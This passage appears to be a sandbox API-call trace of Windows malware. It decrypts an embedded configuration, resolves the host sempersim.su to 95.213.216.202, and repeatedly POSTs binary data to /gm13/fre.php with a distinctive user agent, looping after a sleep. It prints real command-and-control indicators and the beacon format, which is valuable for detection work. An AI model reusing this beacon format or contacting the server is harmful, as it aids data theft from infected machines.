RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0226.925] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0226.927] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0226.927] GetProcessHeap () returned 0x620000 [0226.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0226.927] GetProcessHeap () returned 0x620000 [0226.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0226.927] GetProcessHeap () returned 0x620000 [0226.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643638 [0226.927] GetProcessHeap () returned 0x620000 [0226.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0226.928] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0226.929] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0226.929] GetProcessHeap () returned 0x620000 [0226.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0226.929] GetProcessHeap () returned 0x620000 [0226.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0226.930] send (s=0x3a0, buf=0x63a880*, len=237, flags=0) returned 237 [0226.930] send (s=0x3a0, buf=0x6421e0*, len=159, flags=0) returned 159 [0226.931] GetProcessHeap () returned 0x620000 [0226.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0226.931] recv (in: s=0x3a0, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0228.508] GetProcessHeap () returned 0x620000 [0228.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0228.509] GetProcessHeap () returned 0x620000 [0228.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643638 | out: hHeap=0x620000) returned 1 [0228.509] GetProcessHeap () returned 0x620000 [0228.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0228.510] GetProcessHeap () returned 0x620000 [0228.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63bcb0 | out: hHeap=0x620000) returned 1 [0228.510] closesocket (s=0x3a0) returned 0 [0228.511] GetProcessHeap () returned 0x620000 [0228.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b650 | out: hHeap=0x620000) returned 1 [0228.511] GetProcessHeap () returned 0x620000 [0228.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645a80 | out: hHeap=0x620000) returned 1 [0228.512] GetProcessHeap () returned 0x620000 [0228.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643488 | out: hHeap=0x620000) returned 1 [0228.512] GetProcessHeap () returned 0x620000 [0228.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0228.525] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xa24) returned 0x3a0 [0228.531] Sleep (dwMilliseconds=0xea60) [0228.547] GetProcessHeap () returned 0x620000 [0228.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642e58 [0228.548] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0228.548] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0228.562] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0228.563] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0228.569] GetProcessHeap () returned 0x620000 [0228.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639038 [0228.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0228.570] CryptImportKey (in: hProv=0x63b7e8, pbData=0x639038*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0228.571] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0228.571] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0228.572] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0228.572] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0228.572] GetProcessHeap () returned 0x620000 [0228.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639038 | out: hHeap=0x620000) returned 1 [0228.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0228.575] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642e58, pdwDataLen=0x19fcfc | out: pbData=0x642e58, pdwDataLen=0x19fcfc) returned 1 [0228.579] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0228.579] CryptDestroyKey (hKey=0x62d710) returned 1 [0228.580] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0228.580] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0228.580] GetProcessHeap () returned 0x620000 [0228.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645a80 [0228.581] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0228.581] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0228.581] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0228.582] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0228.582] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0228.583] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0228.583] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0228.583] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0228.583] GetProcessHeap () returned 0x620000 [0228.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0228.583] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0228.584] GetProcessHeap () returned 0x620000 [0228.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0228.585] GetProcessHeap () returned 0x620000 [0228.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645a80 | out: hHeap=0x620000) returned 1 [0228.585] GetProcessHeap () returned 0x620000 [0228.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642e58 | out: hHeap=0x620000) returned 1 [0228.585] GetProcessHeap () returned 0x620000 [0228.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642fc0 [0228.586] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0228.586] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0228.594] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0228.595] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0228.603] GetProcessHeap () returned 0x620000 [0228.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6390f8 [0228.603] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0228.604] CryptImportKey (in: hProv=0x63b7e8, pbData=0x6390f8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0228.605] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0228.605] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0228.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0228.607] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0228.608] GetProcessHeap () returned 0x620000 [0228.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6390f8 | out: hHeap=0x620000) returned 1 [0228.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0228.609] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642fc0, pdwDataLen=0x19fcfc | out: pbData=0x642fc0, pdwDataLen=0x19fcfc) returned 1 [0228.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0228.609] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0228.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0228.610] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0228.610] GetProcessHeap () returned 0x620000 [0228.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x644fb8 [0228.611] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0228.611] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0228.612] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0228.612] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0228.612] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0228.613] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0228.613] GetProcessHeap () returned 0x620000 [0228.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0228.613] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c3c0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ecb8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0228.616] GetProcessHeap () returned 0x620000 [0228.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b520 [0228.616] socket (af=2, type=1, protocol=6) returned 0x3a4 [0228.616] connect (s=0x3a4, name=0x63ecb8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0228.676] FreeAddrInfoW (pAddrInfo=0x63c3c0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ecb8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0228.676] GetProcessHeap () returned 0x620000 [0228.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba08 [0228.676] GetProcessHeap () returned 0x620000 [0228.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0228.677] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0228.678] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0228.678] GetProcessHeap () returned 0x620000 [0228.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0228.678] GetProcessHeap () returned 0x620000 [0228.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0228.679] GetProcessHeap () returned 0x620000 [0228.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643128 [0228.679] GetProcessHeap () returned 0x620000 [0228.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0228.680] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0228.680] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0228.681] GetProcessHeap () returned 0x620000 [0228.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0228.681] GetProcessHeap () returned 0x620000 [0228.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0228.681] send (s=0x3a4, buf=0x63a880*, len=237, flags=0) returned 237 [0228.683] send (s=0x3a4, buf=0x6421e0*, len=159, flags=0) returned 159 [0228.683] GetProcessHeap () returned 0x620000 [0228.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0228.683] recv (in: s=0x3a4, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0230.504] GetProcessHeap () returned 0x620000 [0230.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0230.504] GetProcessHeap () returned 0x620000 [0230.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643128 | out: hHeap=0x620000) returned 1 [0230.505] GetProcessHeap () returned 0x620000 [0230.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0230.505] GetProcessHeap () returned 0x620000 [0230.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba08 | out: hHeap=0x620000) returned 1 [0230.506] closesocket (s=0x3a4) returned 0 [0230.507] GetProcessHeap () returned 0x620000 [0230.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b520 | out: hHeap=0x620000) returned 1 [0230.507] GetProcessHeap () returned 0x620000 [0230.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644fb8 | out: hHeap=0x620000) returned 1 [0230.508] GetProcessHeap () returned 0x620000 [0230.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642fc0 | out: hHeap=0x620000) returned 1 [0230.508] GetProcessHeap () returned 0x620000 [0230.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0230.509] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x464) returned 0x3a4 [0230.511] Sleep (dwMilliseconds=0xea60) [0230.532] GetProcessHeap () returned 0x620000 [0230.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6430e0 [0230.533] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0230.533] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0230.547] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0230.547] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0230.561] GetProcessHeap () returned 0x620000 [0230.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0230.562] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0230.562] CryptImportKey (in: hProv=0x63b7e8, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0230.563] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0230.563] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0230.564] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0230.564] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0230.564] GetProcessHeap () returned 0x620000 [0230.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0230.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0230.566] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6430e0, pdwDataLen=0x19fcfc | out: pbData=0x6430e0, pdwDataLen=0x19fcfc) returned 1 [0230.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0230.567] CryptDestroyKey (hKey=0x62d190) returned 1 [0230.567] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0230.568] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0230.568] GetProcessHeap () returned 0x620000 [0230.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x644d90 [0230.569] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0230.569] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0230.570] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0230.570] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0230.571] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0230.571] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0230.572] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0230.572] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0230.572] GetProcessHeap () returned 0x620000 [0230.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0230.572] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0230.573] GetProcessHeap () returned 0x620000 [0230.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0230.573] GetProcessHeap () returned 0x620000 [0230.574] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644d90 | out: hHeap=0x620000) returned 1 [0230.576] GetProcessHeap () returned 0x620000 [0230.577] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6430e0 | out: hHeap=0x620000) returned 1 [0230.577] GetProcessHeap () returned 0x620000 [0230.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6435f0 [0230.577] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0230.578] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0230.584] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0230.584] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0230.593] GetProcessHeap () returned 0x620000 [0230.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0230.594] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0230.594] CryptImportKey (in: hProv=0x63b7e8, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0230.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0230.595] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0230.596] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0230.596] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0230.596] GetProcessHeap () returned 0x620000 [0230.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0230.598] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0230.598] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6435f0, pdwDataLen=0x19fcfc | out: pbData=0x6435f0, pdwDataLen=0x19fcfc) returned 1 [0230.599] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0230.599] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0230.600] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0230.600] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0230.600] GetProcessHeap () returned 0x620000 [0230.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x6460f8 [0230.601] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0230.601] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0230.602] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0230.602] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0230.603] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0230.603] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0230.603] GetProcessHeap () returned 0x620000 [0230.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633318 [0230.603] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c2d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ebc8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0230.610] GetProcessHeap () returned 0x620000 [0230.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b610 [0230.610] socket (af=2, type=1, protocol=6) returned 0x3a8 [0230.610] connect (s=0x3a8, name=0x63ebc8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0230.666] FreeAddrInfoW (pAddrInfo=0x63c2d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ebc8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0230.666] GetProcessHeap () returned 0x620000 [0230.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0230.666] GetProcessHeap () returned 0x620000 [0230.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0230.667] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0230.668] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0230.668] GetProcessHeap () returned 0x620000 [0230.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0230.669] GetProcessHeap () returned 0x620000 [0230.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0230.669] GetProcessHeap () returned 0x620000 [0230.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x6430e0 [0230.669] GetProcessHeap () returned 0x620000 [0230.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0230.670] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0230.672] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: 